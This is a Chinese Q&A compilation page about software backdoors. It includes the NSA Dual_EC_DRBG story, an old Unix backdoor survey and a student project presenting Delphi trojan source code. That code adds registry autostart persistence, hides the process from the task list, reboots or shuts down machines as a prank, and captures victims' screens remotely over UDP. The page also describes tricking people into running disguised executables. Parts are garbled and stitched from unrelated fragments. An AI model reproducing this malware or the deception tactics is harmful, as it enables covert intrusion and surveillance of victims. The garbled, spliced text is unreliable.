关于加密后门的意思

A. NSA 在 RSA 加密算法中安置后门是怎么一回事，有何影响

1、RSA是目前最为流行的公钥加密算法，也称之为非对称加密算法。是RSA公司发明的。
2、到目前为止，RSA算法并未发现任何缺陷。
3、RSA和其他加密算法一样，是基于密钥的（只不过密钥有两个，公钥和私钥）。为了确保安全，密钥是采用某种伪随机函数（纯机械运算没有所谓的“真”随机函数）生成的。
4、RSA公司推出的BSafe安全软件，提供了RSA加解密，以及密钥自动产生等功能。
5、但是BSafe软件产生密钥所使用的算法Dual_EC_DRBG，已经被研究人员确认为是可能存在后门的算法。事实上这已经意味着BSafe软件产生的密钥并不安全了（这在2007年）。但RSA算法还是安全的。
6、目前最新的进展是，斯诺登披露的文件证明了，美国国家安全局（NSA）通过贿赂RSA公司，使其在BSafe安全软件中采用Dual_EC_DRBG算法。而Dual_EC_DRBG则是NSA精心设计的留有后门的算法（当然NSA可能没有告诉RSA公司这一点）。
7、事实上根据RSA算法的设计，如果没有在数论上有重大突破，
那么几乎是不可能被破解的。目前所谓的破解，更多的是针对RSA密钥的直接破解，例如在密钥生成算法中植入后门，也就是Dual_EC_DRBG算法，或
者监听CPU在加密时产生的噪声来推测所使用的密钥。这些方式的局限性在于必须侵入加密过程之前或之中，一旦加密完成，目前没有已知的办法破解。所以
RSA目前还是相对安全的。
8、未来RSA可能的挑战有两个，即数论上出现重大突破，或者计算机计算能力暴增。

B. 什么是后门

后门，本意是指一座建筑背面开设的门，通常比较隐蔽，为进出建筑的人提供方便和隐蔽。现今主要是指说靠着金钱利益关系，不通过正常途径获取的名利，具有华而不实，贬义的色彩。在信息安全领域，后门是指绕过安全控制而获取对程序或系统访问权的方法。后门的最主要目的就是方便以后再次秘密进入或者控制系统。

主机上的后门来源主要有以下几种：

1，攻击者利用欺骗的手段，通过发送电子邮件或者文件，并诱使主机的操作员打开或运行藏有木马程序的邮件或文件，这些木马程序就会在主机上创建一个后门。

2，攻击者攻陷一台主机，获得其控制权后，在主机上建立后门，比如安装木马程序，以便下一次入侵时使用。

3，还有一种后门是软件开发过程中引入的。在软件的开发阶段，程序员常会在软件内创建后门以方便测试或者修改程序中的缺陷，但在软件发布时，后门被有意或者无意忽视了，没有被删除，那么这个软件天生就存在后门，安装该软件的主机就不可避免的引入了后门。

大多数入侵者的后门实现以下目的：

即使管理员通过改变所有密码之类的方法来提高安全性，仍然能再次侵入，使再次侵入被发现的可能性减至最低。

大多数后门设法躲过日志，大多数情况下即使入侵者正在使用系统也无法显示他已在线。

后门的引入无疑会形成重大安全风险。知道后门的人，日后可以对系统进行隐蔽的访问和控制，而且后门也容易被入侵者当成漏洞进行攻击。

C. NSA 在 RSA 加密算法中安置后门是怎么一回事，有何影响

去年12月，两名知情人士称，RSA收受了1000万美元，将NSA提供的一套密码系统设定为大量网站和计算机安全程序所使用软件的默认系统。这套“双椭圆曲线”（Dual Elliptic Curve）系统从此成为了RSA安全软件中生成随机数的默认算法。

疑问

问题随即出现，因为这套系统存在一个明显缺陷（即“后门程序”），能够让NSA通过随机数生成算法的后门程序轻易破解各种加密数据。 此次来自美国约翰-霍普金斯大学、威斯康辛州立大学、伊利诺伊州立大学和另外几所大学的9位教授在一份研究报告中表示，他们已经发现了NSA在RSA加密技术中放置的第二个解密工具。

保障（读音bǎo zhàng），指作为社会成员之间的某种意义上的交互动态的有限支撑和支持，比如：基本生存、基本生活、基本医疗、就业、失业、阶段性的免费义务教育、基本养老、居住条件、安全、合情合理、正当正义的言论自由等。

总结

这还是一个比较高端的问题。

D. 装系统中的后门是什么起什么作用有什么有利和有害的如何弄

系统后门一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。

创建过程：在软件的开发阶段，程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。

利弊：使再次侵入被发现的可能性减至最低。但是，如果这些后门被其他人知道，或是在发布软件之前没有删除后门程序，那么它就成了安全风险，容易被黑客当成漏洞进行攻击。

作用：使系统管理员无法阻止种植者再次进入系统：使种植者在系统中不易被发现：使种植者进入系统花最少时间。

(4)关于加密后门的意思扩展阅读

早期的电脑黑客，在成功获得远程系统的控制权后，希望能有一种技术使得他们在任意的时间都可以再次进入远程系统，于是后门程序就出现了。

后门程序跟我们通常所说的“木马”有联系也有区别。联系在于，都是隐藏在用户系统中向外发送信息，而且本身具有一定权限，以便远程机器对本机的控制；区别在于，木马是一个非常完整的工具集合，而后门则体积较小且功能都很单一，所以木马提供的功能远远超过后门程序。

E. 电脑网络中的“后门”是什么意思

电脑网络中的“后门”即是网络的漏洞

一、问题的提出
"The Internet is now more like an unlocked diary,with millions of consumers divulging marketable details of their personal lives,from where they live to what they eat for dinner."这是着名匿名服务器站点Anonymizer上曾有过的一段话。是的，在不知不觉中，E时代已经到来，网络给我们的生活增添了绚丽与多彩。但是，在这五彩缤纷的世界下面，潜伏着一股黑潮暗流--黑客（HACKER）。这个名词越来越引起世人的关注，而且影响越来越大，关于黑客事件的报道也越来越多。黑客是伴随网络产生成长的，是指那些对电脑和网络有狂热兴趣的人，他们不断的研究电脑和网络知识，发现电脑和网络中的漏洞，喜欢挑战高难度的网络系统，千方百计的寻找网络中的大小漏洞，然后向网络管理员提出解决漏洞的建议。真正的黑客大多是赋有正义感的。他们不会恶意侵入他人系统，并且破坏系统程序和数据。但有一些人特别崇拜黑客，喜欢利用电脑网络四处捣乱，到处寻找黑客软件，然后到处搞破坏，这类人应该是网络上最危险的家伙。现在的媒体把这类人是黑客混为一谈，"黑客"一词也因此成了贬义词。
现在的黑客软件十分多，Back Orific、冰河、YAI到处都有。接触网络后，我经常想：黑客软件到底是如何编制的？我能编一个黑客软件多好呀！这到不是想干坏事，因为在网络机房上课时，用一些黑客软件可以作为控制工具来控制学员的机器（如：冰河）。可见黑客软件本身不象病毒是个不好的东西，是可以用在正路上的。经过我的摸索，初步掌握了一些设计方法，主要是特洛伊木马程序。本次毕业设计，我设计一个模拟黑客入侵程序，一个恶作剧程序，一个可以截获网络上别人在机器上干些什么的程序，几个程序纯属用于实验，没有什么其它目的。在这里向各位老师汇报一下。程序设计的语言用的是PASCAL，用DELPHI 4进行编译。

二、"特洛伊木马"如何入侵系统
一个完整的"特洛伊木马"一般分为两个部分：一个是客户服务程序（Client），用它来控制已经打开"后门"的机器；另一个是"后门"程序，用它来开放某台机器。假设我们想控制某台电脑，那么我们通过一些手段来把"后门"程序传到该电脑中并使其运行，这样该电脑就变成了一台特殊的FTP服务器。然后我们使用Client程序就可以控制该电脑了。当然，后门程序如果不运行也就无法发挥作用。因此，就要"诱骗"别人使用后门程序。如果是朋友或熟人，利用他们的信任让他运行就行了；要是陌生人，可以在聊天室中和他们套近乎，一旦取得信任，把程序发给他们，诱骗其运行。当然，程序要隐蔽一些，例如可以把后门程序改名，变为README之类，或改变后缀，变成GIF、BMP等，当他们双击这些文件后就上了"贼船"了。也可以用WINZIP的把后门程序和一些东西制作成一个自解压包，然后利用设定解压后自动运行SETUP程序功能来运行指定的后门程序。总之，要利用一切手段使人家运行后门程序。
木马程序运行后，会通过不同的方式修改系统，以便以后启动系统后自动运行木马。修改方法一般是通过修改注册表：
Hkey_local_machine \Software\Microsoft\Windows\CurrentVersion\Run和
Hkey_local_machine\Software\Microsoft\Windows\CurrentVersion\RunServices中的项目是在系统开机时自动加载的，我们可以在这两添加键值，达到自动启动的目的。以下的这段代码可以修改注册表，并调用API函数判断系统目录，复制文件到其下，以实行入侵系统的目的：

unit Unit1;

interface

uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
StdCtrls,registry;
type
TForm1 = class(TForm)
Button1: TButton;
Button2: TButton;
procere Button1Click(Sender: TObject);
procere Button2Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;

var
Form1: TForm1;

implementation

{$R *.DFM}

procere TForm1.Button1Click(Sender: TObject);
var
regf:tregistry;
sysdir:pchar;
temp:string;
begin
getmem(sysdir,256);
getsystemdirectory(sysdir,128);
temp:=sysdir+'\client.exe';
freemem(sysdir,256);
regf:=tregistry.create;
regf.rootkey:=hkey_local_machine;
regf.openkey('software\microsoft\windows\currentversion\run',true);
regf.writestring(' ',temp);
regf.free;
file(pchar('hacker.exe'),pchar(temp),true);
end;

procere TForm1.Button2Click(Sender: TObject);
begin
close;
end;
end.

也有些高明的程序可以感染系统文件，附着在这些程序文件中，以达到其目的。我还没有搞清楚这是怎样办到的。
在Windows中按下Ctrl+Alt+Del可以显示当前运行的程序，这样一来，我们的木马程序不是要露馅了吗？以下这段汇编代码可以很方便的嵌入DELPHI或C++中，让别人看不到你的程序，可以很好的隐藏：
asm
mov ebx,30h
push es
push fs
pop es
mov ebx,es:[ebx]
pop es
mov eax,10800000h
xchg [ebx+20h],eax
end;
为什么这段汇编代码可以隐藏程序呢？据资料分析：在WINDOWS 9X加载应用程序时，FS指向的段就是类似于DOS应用程序的PSP，里面保存着一些有关应用程序重要数据，按下Ctrl+Alt+Del后，对于一个应用程序，若没有可显示的ENABLE窗口的名字，则系统要检查上面程序段中的特定双字是不是10800000h，如果是就不显示这个应用程序的可执行文件的名字。
下面是一个恶作剧的程序，入侵计算机后，每次开机后，随机出现鼠标乱跑并发出怪叫、热启动、强行关机的现象，让你无法进入WINDOWS 9X。对于一般的计算机用户来说，因为找不出这个程序在何处，所以只能格式化系统区，重新安装系统。

program hacker;
uses
windows;
var temp:integer;
begin
asm
mov ebx,30h
push es
push fs
pop es
mov ebx,es:[ebx]
pop es
mov eax,10800000h
xchg [ebx+20h],eax
end;
randomize;
temp:=random(3);
if temp=0 then
while(true) do
begin
messagebeep(0);
SetCursorPos (random(640),random(480));
end
else if temp=1 then
ExitWindowsEx(EWX_REBOOT,0)
else ExitWindowsEx(EWX_SHUTDOWN,0);
end.

有的木马为了防止发现后被清除，在启动时会产生一个备份，一般是感染WINDOWS的系统文件，当木马被发现并清除后，备份会自动激活，使你依然处于远程黑手的控制。比如当前国最盛行的"冰河"，首先会修改注册表的启动项目，将自己复制两份到系统中，分别为KERNEL32.EXE和SYSEXPLE.EXE，并且修改TXT文件的打开方式，一旦KERNEL32.EXE被删除，那么当打开一个TXT文件时，SYSEXPLE.EXE将再产生一个KERNEL32.EXE文件。
另外，有的木马还能在运行后修改文件名，或者复制感染系统后，进行自我销毁，使用户很难进行查找。

三、木马的种类
1、破坏型
惟一的功能就是破坏并且删除文件，可以自动的删除电脑上的DLL、INI、EXE文件。
2、密码发送型
可以找到隐藏密码并把它们发送到指定的信箱。有人喜欢把自己的各种密码以文件的形式存放在计算机中，认为这样方便；还有人喜欢用WINDOWS提供的密码记忆功能，这样就可以不必每次都输入密码了。许多黑客软件可以寻找到这些文件，把它们送到黑客手中。也有些黑客软件长期潜伏，记录操作者的键盘操作，从中寻找有用的密码。
在这里提醒一下，不要认为自己在文档中加了密码而把重要的保密文件存在公用计算机中，那你就大错特错了。别有用心的人完全可以用穷举法暴力破译你的密码。利用WINDOWS API函数EnumWindows和EnumChildWindows对当前运行的所有程序的所有窗口（包括控件）进行遍历，通过窗口标题查找密码输入和出确认重新输入窗口，通过按钮标题查找我们应该单击的按钮，通过ES_PASSWORD查找我们需要键入的密码窗口。向密码输入窗口发送WM_SETTEXT消息模拟输入密码，向按钮窗口发送WM_COMMAND消息模拟单击。在破解过程中，把密码保存在一个文件中，以便在下一个序列的密码再次进行穷举或多部机器同时进行分工穷举，直到找到密码为止。此类程序在黑客网站上唾手可得，精通程序设计的人，完全可以自编一个。
3、远程访问型
最广泛的是特洛伊马，只需有人运行了服务端程序，如果客户知道了服务端的IP地址，就可以实现远程控制。以下的程序可以实现观察"受害者"正在干什么，当然这个程序完全可以用在正道上的，比如监视学生机的操作。
程序中用的UDP（User Datagram Protocol，用户报文协议）是因特网上广泛采用的通信协议之一。与TCP协议不同，它是一种非连接的传输协议，没有确认机制，可靠性不如TCP，但它的效率却比TCP高，用于远程屏幕监视还是比较适合的。它不区分服务器端和客户端，只区分发送端和接收端，编程上较为简单，故选用了UDP协议。本程序中用了DELPHI提供的TNMUDP控件。

受控机程序部分：
让控件CUDP监视受控机的1111端口，当有数据发送到该口时，触发控件CUDP的ONDATARECEIVED事件；REMOTEPORT属性设为2222，当控件CUDP发送数据时，将数据发送到主控机的2222口。

unit Unit1;

interface

uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
NMUDP, ComCtrls;

type
Tclient = class(TForm)
cudp: TNMUDP;
Animate1: TAnimate;
procere FormCreate(Sender: TObject);
procere FormDestroy(Sender: TObject);
procere cudpDataReceived(Sender: TComponent; NumberBytes: Integer;
FromIP: String);
private
{ Private declarations }
public
{ Public declarations }
end;

var
client: Tclient;

implementation
const bufsize=2048;//发送每一批数据的缓冲区大小
var
bmpstream:tmemorystream;
leftsize:longint;
{$R *.DFM}

procere screencap(leftpos,toppos,rightpos,bottompos:integer);
var
recwidth,recheight:integer;
sourcedc,destdc,bhandle:integer;
bitmap:Tbitmap;
begin
recwidth:=rightpos-leftpos;
recheight:=bottompos-toppos;
sourcedc:=createdc('display','','',nil);
destdc:=createcompatibledc(sourcedc);
bhandle:=createcompatiblebitmap(sourcedc,recwidth,recheight);
selectobject(destdc,bhandle);
bitblt(destdc,0,0,recwidth,recheight,sourcedc,leftpos,toppos,src);
bitmap:=tbitmap.Create;
bitmap.Handle:=bhandle;
bitmap.SaveToStream(bmpstream);
bmpstream.Position:=0;
leftsize:=bmpstream.Size;
bitmap.Free;
deletedc(destdc);
releasedc(bhandle,sourcedc);
end;

procere Tclient.FormCreate(Sender: TObject);
begin
bmpstream:=tmemorystream.create;
end;

procere Tclient.FormDestroy(Sender: TObject);
begin
bmpstream.free;
end;

procere Tclient.cudpDataReceived(Sender: TComponent;
NumberBytes: Integer; FromIP: String);
var
ctrlcode:array[0..29] of char;
buf:array[0..bufsize-1] of char;
tmpstr:string;
sendsize,leftpos,toppos,rightpos,bottompos:integer;
begin
cudp.ReadBuffer(ctrlcode,numberbytes);//读取控制码
if ctrlcode[0]+ctrlcode[1]+ctrlcode[2]+ctrlcode[3]='show'
then
begin//控制码前4位为"SHOW"表示主控机发出了截屏指令
if bmpstream.Size=0 then//没有数据可发，必须截屏生成数据
begin tmpstr:=strpas(ctrlcode);
tmpstr:=(tmpstr,5,length(tmpstr)-4);
leftpos:=strtoint((tmpstr,1,pos(':',tmpstr)-1));
tmpstr:=(tmpstr,pos(':',tmpstr)+1,length(tmpstr)-pos(':',tmpstr));
toppos:=strtoint((tmpstr,1,pos(':',tmpstr)-1));
tmpstr:=(tmpstr,pos(':',tmpstr)+1,length(tmpstr)-pos(':',tmpstr));
rightpos:=strtoint((tmpstr,1,pos(':',tmpstr)-1));
bottompos:=strtoint((tmpstr,pos(':',tmpstr)+1,length(tmpstr)-pos(':',tmpstr)));
screencap(leftpos,toppos,rightpos,bottompos);//调用截屏函数
end;
if leftsize>bufsize then sendsize:=bufsize
else sendsize:=leftsize;
bmpstream.ReadBuffer(buf,sendsize);
leftsize:=leftsize-sendsize;
if leftsize=0 then bmpstream.Clear;
cudp.RemoteHost:=fromip;//FROMIP为主控机IP地址
cudp.SendBuffer(buf,sendsize);//将数据发到主控机的2222端口
end;
end;
end.

主控机程序部分：
让控件SUDP监视主控机的2222端口，当有数据发送到该口时，触发SUDP的ONDATARECEIVED事件；REMOTEPORT属性设为1111，当控件SUDP发送数据时，将数据发到受控机的1111口。

unit Unit1;

interface

uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
ExtCtrls, StdCtrls, Buttons, NMUDP;

type
Tsever = class(TForm)
Edit1: TEdit;
Edit2: TEdit;
Label1: TLabel;
Label2: TLabel;
BitBtn1: TBitBtn;
Image1: TImage;
BitBtn2: TBitBtn;
sudp: TNMUDP;
procere BitBtn2Click(Sender: TObject);
procere FormCreate(Sender: TObject);
procere FormDestroy(Sender: TObject);
procere BitBtn1Click(Sender: TObject);
procere sudpDataReceived(Sender: TComponent; NumberBytes: Integer;
FromIP: String);
private
{ Private declarations }
public
{ Public declarations }
end;

var
sever: Tsever;

implementation
const bufsize=2048;
var
rsltstream,tmpstream:tmemorystream;
{$R *.DFM}

procere Tsever.BitBtn2Click(Sender: TObject);
begin
close;
end;

procere Tsever.FormCreate(Sender: TObject);
begin
rsltstream:=tmemorystream.create;
tmpstream:=tmemorystream.create;
end;

procere Tsever.FormDestroy(Sender: TObject);
begin
rsltstream.free;
tmpstream.free;
end;

procere Tsever.BitBtn1Click(Sender: TObject);
var
reqcode:array[0..29] of char;
reqcodestr:string;
begin
reqcodestr:='show'+edit1.text;
strp(reqcode,reqcodestr);
tmpstream.Clear;
rsltstream.Clear;
sudp.RemoteHost:=edit2.Text;
sudp.SendBuffer(reqcode,30);
end;

procere Tsever.sudpDataReceived(Sender: TComponent; NumberBytes: Integer;
FromIP: String);
var reqcode:array[0..29] of char;
reqcodestr:string;
begin
reqcodestr:='show'+edit1.text;
strp(reqcode,reqcodestr);
sudp.ReadStream(tmpstream);
rsltstream.CopyFrom(tmpstream,numberbytes);
if numberbytes<bufsize then
begin
rsltstream.Position:=0;
image1.Picture.Bitmap.LoadFromStream(rsltstream);
tmpstream.Clear;
rsltstream.Clear;
end
else
begin
tmpstream.Clear;
reqcode:='show';
sudp.RemoteHost:=edit2.Text;
sudp.SendBuffer(reqcode,30);
end;
end;
end.

四、如何预防黑客
黑客程序虽然破坏大，但不是不能防止的。
1、处理好你的密码
我们一般是用账号和密码来上网的，密码的设置无疑是十分讲求技巧的，许多人的安全防范意识差，不注意密码的设置，造成自己的账号被盗用。如今的黑客软件都是挂上密码字典，然后用穷举法进行破解，密码太简单，那么破解的可能性就大了。以下是一些注意事项。
⑴ 密码不可和账号相同，这是最容易被猜到的了。
⑵ 经常更改密码，拿到新账号后要立即更改密码，不要放久了。
⑶ 密码最好多于8个字符，字符越长，破解难度越大。例如WORD文档的密码大于8位后，目前的破解软件几乎无法攻破。另外，最好在密码中加入一些控制键，增加破译难度。千万不可用单一的字母或数字。
⑷ 有人喜欢用自己的生日、电话、身份证号码等作为密码，你不要这样做。
⑸ 密码尽量不要记显眼的纸张上，更不能保存在计算机中，不要贪图一时方便，用WINDOWS提供的保存密码功能。
2、不要运行不明真相的程序
无论都高明的黑客程序，只要你不去运行它，就无法害到你。所以，不可相信网友的话，不要去运行他提供的程序；不要随意去打开别人寄来的附件，无论他把附件中的图片或影片吹得如何好看；要到大的、着名的网站去下载软件，千万不要到不明真象的个人网页下载，因为在那儿你可能下载的病毒和黑客之手；如果你十分羡慕黑客，也请你不要下载所谓的黑客软件，否则你没害到别人，自己反被害了；如果你的机器上有防火墙，在上网时一定要打开，不要怕麻烦。
3、经常检查系统信息
上网过程中，突然觉得计算机工作不对劲时，仿佛感觉有人在遥远的地方遥控你。这时，你必须及时停止手中工作，运行"附件→系统工具→系统信息"，在任务列表中寻找自己不熟悉的或者自己并没有运行的程序，一旦找到程序后应立即终止它的运行，以防后患。
4、最好不去聊天室
我一直认为聊天室没有什么意思，特别对于计算机专业人员，聊天只是浪费时间和金钱，有些恶意的破坏者利用网上聊天室的漏洞干坏事，例如聊天室支持JAVA、HTML等功能，然而，这小小的JAVA也隐藏"杀机"，他可以发给你一个足以让你的机器当机的HTML语句。因为这些语句是不会在聊天室显示出来的，所以你被暗算了可能还不知道。防治的办法是在你的浏览器中关闭你的JAVA脚本。想聊天的，在公共机房聊聊算了，不能在自己的机器上聊天。

F. 电脑后门是什么意思

电脑后门是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。

在软件的开发阶段，程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。但是，如果这些后门被其他人知道，或是在发布软件之前没有删除后门程序，那么它就成了安全风险，容易被黑客当成漏洞进行攻击。

后门程序不仅绕过系统已有的安全设置，而且还能挫败系统上各种增强的安全设置。而且在病毒命名中，后门一般带有backdoor字样，而木马一般则是Trojan字样。

着名后门

最着名的后门程序，该算是微软的Windows Update了。Windows Update的动作不外乎以下三个：开机时自动连上微软的网站，将电脑的现况报告给网站以进行处理，网站通过Windows Update程序通知使用者是否有必须更新的文件，以及如何更新。

如果针对这些动作进行分析，则“开机时自动连上微软网站”的动作就是后门程序特性中的“潜伏”，而“将电脑现况报告”的动作是“搜集信息”。

因此，虽然微软“信誓旦旦”地说它不会搜集个人电脑中的信息，但如果我们从Windows Update来进行分析的话，就会发现它必须搜集个人电脑的信息才能进行操作，所差者只是搜集了哪些信息而已。

G. 黑客中说的后门什么意思

一般黑客都会在攻入系统后不只一次地进入该系统。为了下次再进入系统时方便一点，黑客会留下一个后门，特洛伊木马就是后门的最好范例。Unix中留后门的方法有很多种，下面介绍几种常见的后门，供网络管理员参考防范。
密码破解后门
这是入侵者使用的最早也是最老的方法，它不仅可以获得对Unix机器的访问，而且可 以通过破解密码制造后门。这就是破解口令薄弱的帐号。以后即使管理员封了入侵者的当前帐号，这些新的帐号仍然可能是重新侵入的后门。多数情况下，入侵者寻找口令薄弱的未使用帐号，然后将口令改的难些。当管理员寻找口令薄弱的帐号是，也不会发现这些密码已修改的帐号。因而管理员很难确定查封哪个帐号。
Rhosts + + 后门
在连网的Unix机器中，象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简 单的认证方法。用户可以轻易的改变设置而不需口令就能进入。入侵者只要向可以访问的某用户的rhosts文件中输入"+ +"，就可以允许任何人从任何地方无须口令便能进入这个帐号。特别当home目录通过NFS向外共享时，入侵者更热中于此。这些帐号也成 了入侵者再次侵入的后门。许多人更喜欢使用Rsh，因为它通常缺少日志能力。许多管理员经常检查 "+ +"，所以入侵者实际上多设置来自网上的另一个帐号的主机名和用户名，从而不易被发现。
校验和及时间戳后门
早期，许多入侵者用自己的trojan程序替代二进制文件。系统管理员便依靠时间戳和系 统校验和的程序辨别一个二进制文件是否已被改变，如Unix里的sum程序。入侵者又发展了使trojan文件和原文件时间戳同步的新技术。它是这样实现的: 先将系统时钟拨回到原文件时间，然后调整trojan文件的时间为系统时间。一旦二进制trojan文件与 原来的精确同步，就可以把系统时间设回当前时间。Sum程序是基于CRC校验，很容易骗过。入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序。MD5是被 大多数人推荐的，MD5使用的算法目前还没人能骗过。
Login后门
在Unix里，login程序通常用来对telnet来的用户进行口令验证。 入侵者获取login.c的原代码并修改，使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门 口令，它将忽视管理员设置的口令让你长驱直入。这将允许入侵者进入任何帐号，甚至是root。由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问 的，所以入侵者可以登录获取shell却不会暴露该帐号。管理员注意到这种后门后，便用"strings"命令搜索login程序以寻找文本信息。 许多情况下后门口令会原形毕露。入侵者就开始加密或者更好的隐藏口令，使strings命令失效。 所以更多的管理员是用MD5校验和检测这种后门的。
Telnetd后门
当用户telnet到系统，监听端口的inetd服务接受连接随后递给in.telnetd，由它运行 login.一些入侵者知道管理员会检查login是否被修改，就着手修改in.telnetd. 在in.telnetd内部有一些对用户信息的检验，比如用户使用了何种终端。典型的终端 设置是Xterm或者VT100.入侵者可以做这样的后门，当终端设置为"letmein"时产生一个不要任何验证的shell. 入侵者已对某些服务作了后门，对来自特定源端口的连接产生一个shell。
服务后门
几乎所有网络服务曾被入侵者作过后门。 Finger，rsh，rexec，rlogin，ftp，甚至 inetd等等的作了的版本随处多是。有的只是连接到某个TCP端口的shell，通过后门口令就能获取访问。这些程序有时用刺娲□？Ucp这样不用的服务，或者被加入inetd.conf 作为一个新的服务，管理员应该非常注意那些服务正在运行，并用MD5对原服务程序做校验。
Cronjob后门
Unix上的Cronjob可以按时间表调度特定程序的运行。入侵者可以加入后门shell程序使它在1AM到2AM之间运行，那么每晚有一个小时可以获得访问。也可以查看cronjob中 经常运行的合法程序，同时置入后门。
库后门
几乎所有的UNIX系统使用共享库，共享库用于相同函数的重用而减少代码长度。一些入侵者在象crypt.c和_crypt.c这些函数里作了后门；象login.c这样的程序调用了 crypt()。当使用后门口令时产生一个shell。因此，即使管理员用MD5检查login程序，仍然能产生一个后门函数，而且许多管理员并不会检查库是否被做了后门。对于许多入侵者来说有一个问题： 一些管理员对所有东西多作了MD5校验，有一种办法是入侵者对open()和文件访问函数做后门。后门函数读原文件但执行trojan后门程序。所以当MD5读这些文件时，校验和一切正常，但当系统运行时将执行trojan版本的，即使trojan库本身也可躲过MD5校验，对于管理员来说有一种方法可以找到后门，就是静态编连MD5校验程序然后运行，静态连接程序不会使用trojan共享库。
内核后门
内核是Unix工作的核心，用于库躲过MD5校验的方法同样适用于内核级别，甚至连静态 连接多不能识别。一个后门作的很好的内核是最难被管理员查找的，所幸的是内核的 后门程序还不是随手可得，每人知道它事实上传播有多广。
文件系统后门
入侵者需要在服务器上存储他们的掠夺品或数据，并不能被管理员发现，入侵者的文章常是包括exploit脚本工具，后门集，sniffer日志，email的备分，原代码，等等！有时为了防止管理员发现这么大的文件，入侵者需要修补"ls"，""，"fsck"以隐匿特定的目录和文件，在很低的级别，入侵者做这样的漏洞： 以专有的格式在硬盘上割出一部分，且表示为坏的扇区。因此入侵者只能用特别的工具访问这些隐藏的文件，对于普通的管理员来说，很难发现这些"坏扇区"里的文件系统，而它又确实存在。
Boot块后门
在PC世界里，许多病毒藏匿与根区，而杀病毒软件就是检查根区是否被改变。Unix下，多数管理员没有检查根区的软件，所以一些入侵者将一些后门留在根区。
隐匿进程后门
入侵者通常想隐匿他们运行的程序，这样的程序一般是口令破解程序和监听程序(sniffer)，有许多办法可以实现，这里是较通用的： 编写程序时修改自己的argv[] 使它看起来象其他进程名。可以将sniffer程序改名类似in.syslog再执行，因此当管理员用"ps"检查运行进程时，出现 的是标准服务名。可以修改库函数致使"ps"不能显示所有进程，可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现。使用这个技术的一个后门例子是
amod.tar.gz :
网络通行。这些网络通行后 门有时允许入侵者通过防火墙进行访问。有许多网络后门程序允许入侵者建立某个端口号并不用通过普通服务就能实现访问。 因为这是通过非标准网络端口的通行，管理员可能忽视入侵者的足迹。 这种后门通常使用TCP，UDP和ICMP，但也可能是其他类型报文。
TCP Shell 后门
入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门. 许多情况下，他们用口令进行保护以免管理员连接上后立即看到是shell访问。 管理员可以用netstat 命令查看当前的连接状态，那些端口在侦听，目前连接的来龙去脉。 通常这些后门可以让入侵者躲过TCP Wrapper技术。这些后门可以放在SMTP端口，许多防火墙允许 e-mail通行的.
UDP Shell 后门
管理员经常注意TCP连接并观察其怪异情况，而UDP Shell后门没有这样的连接，所以 netstat不能显示入侵者的访问痕迹，许多防火墙设置成允许类似DNS的UDP报文的通行，通常入侵者将UDP Shell放置在这个端口，允许穿越防火墙。
ICMP Shell 后门
Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一。许多防火墙允许外界ping它内部的机器，入侵者可以放数据入Ping的ICMP包，在ping的机器间形成一个shell通道，管理员也许会注意到Ping包暴风，但除了他查看包内数据，否者入侵者不会暴露。
加密连接
管理员可能建立一个sniffer试图某个访问的数据，但当入侵者给网络通行后门加密 后，就不可能被判定两台机器间的传输内容了。

H. 什么是后门怎么才能发现一款软件有后门

当一个训练有素的程序员设计一个功能较复杂的软件时，都习惯于先将整个软件分割为若干模块，然后再对各模块单独设计、调试，而后门则是一个模块的秘密入口。在程序开发期间，后门的存在是为了便于测试、更改和增强模块的功能。当然，程序员一般不会把后门记入软件的说明文档，因此用户通常无法了解后门的存在。
/按照正常操作程序，在软件交付用户之前，程序员应该去掉软件模块中的后门，但是，由于程序员的疏忽，或者故意将其留在程序中以便日后可以对此程序进行隐蔽的访问，方便测试或维护已完成的程序等种种原因，实际上并未去掉。
这样，后门就可能被程序的作者所秘密使用，也可能被少数别有用心的人用穷举搜索法发现利用。

http://cache..com/c?word=%CA%B2%C3%B4%3B%CA%C7%3B%BA%F3%C3%C5&url=http%3A//www%2Exiaom%2Ecom/Article%5Fshow%2Easp%3FArticleID%3D4777&b=0&a=29&user=

什么是后门?
从早期的计算机入侵者开始,他们就努力发展能使自己重返被入侵系统的技术或后门.本文将讨论许多常见的后门及其检测方法. 更多的焦点放在Unix系统的后门,同时讨论一些未来将会出现的Windows NT的后门. 本文将描述如何测定入侵者使用的方法这样的复杂内容和管理员如何防止入侵者重返的基础知识. 当管理员懂的一旦入侵者入侵后要制止他们是何等之难以后, 将更主动于预防第一次入侵. 本文试图涉及大量流行的初级和高级入侵者制作后门的手法, 但不会也不可能覆盖到所有可能的方法.

大多数入侵者的后门实现以下二到三个目的:

即使管理员通过改变所有密码类似的方法来提高安全性,仍然能再次侵入. 使再次侵入被发现的可能性减至最低.大多数后门设法躲过日志, 大多数情况下即使入侵者正在使用系统也无法显示他已在线. 一些情况下, 如果入侵者认为管理员可能会检测到已经安装的后门, 他们以系统的 脆弱性作为唯一的后门, 重而反复攻破机器. 这也不会引起管理员的注意. 所以在 这样的情况下，一台机器的脆弱性是它唯一未被注意的后门.

密码破解后门

这是入侵者使用的最早也是最老的方法, 它不仅可以获得对Unix机器的访问, 而且可以通过破解密码制造后门. 这就是破解口令薄弱的帐号. 以后即使管理员封了入侵者的当前帐号,这些新的帐号仍然可能是重新侵入的后门. 多数情况下, 入侵者寻找口令薄弱的未使用帐号,然后将口令改的难些. 当管理员寻找口令薄弱的帐号是, 也不会发现这些密码已修改的帐号.因而管理员很难确定查封哪个帐号.

Rhosts + + 后门

